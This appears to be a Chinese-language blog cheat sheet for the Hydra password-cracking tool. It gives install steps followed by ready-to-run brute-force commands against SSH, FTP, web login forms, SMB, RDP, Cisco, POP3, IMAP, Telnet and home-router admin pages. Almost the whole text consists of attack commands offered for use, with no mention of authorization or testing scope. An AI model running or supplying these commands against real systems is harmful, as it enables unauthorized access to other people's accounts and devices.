Hydra---Linux下的暴力美学

引自：http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html

安装：http://www.91ri.org/2867.html

yum install -y openssl cmake openssl-devel　　#install these three packages before install hydra
wget http://www.libssh.org/files/0.5/libssh-0.5.3.tar.gz　　#http://www.ossec.cn/?p=411
tar xzvf libssh-0.5.3.tar.gz
cd libssh-0.5.3
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug ..
make && make install
ldconfig　　#有可能需要添加编译出libssh.so文件的路径至/etc/ld.so.conf,然后:ldconfig

wget http://www.thc.org/releases/hydra-8.1.tar.gz
tar zxvf hydra-8.1.tar.gz
cd hydra-8.1
./configure 
make && make install

• 破解ssh示例：

hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

• 破解ftp方法：

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

• get方式提交，破解web登录：

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

• post方式提交，破解web登录：

<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

说明：破解的用户名是admin，密码字典是pass.lst，破解结果保存在ok.lst，-t 是同时线程数为1，-f 是当破解了一个密码就停止，ip 是本地，就是目标ip，http-post-form表示破解是采用http 的post 方式提交的表单密码破解。后面参数是网页中对应的表单字段的name 属性，后面<title>中的内容是表示错误猜解的返回信息提示，可以自定义。

• 破解https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

• 破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

• 破解cisco：

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

• 破解smb：

hydra -l administrator -P pass.txt 10.36.16.18 smb

• 破解pop3：

hydra -l muts -P pass.txt my.pop3.mail pop3

• 破解rdp：

hydra ip rdp -l administrator -P pass.txt -V

范例参考：http://dfyl520.cn/?post=67

• 破解http-proxy：

hydra -l admin -P pass.txt http-proxy://10.36.16.18

• 破解imap：

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

• 破解telnet：

hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

•  恢复之前意外关闭的进程

hydra -R

PS.关于cmake

• http://sewm.pku.edu.cn/src/paradise/reference/CMake%20Practice.pdf
• 使用基本认证方式的路由器（如TP-Link)管理界面破解：http://my.oschina.net/sincoder/blog/91611
  • 　　eg:hydra  -l admin -P /root/pass.txt -f -V -e nsr  192.168.0.1 http-get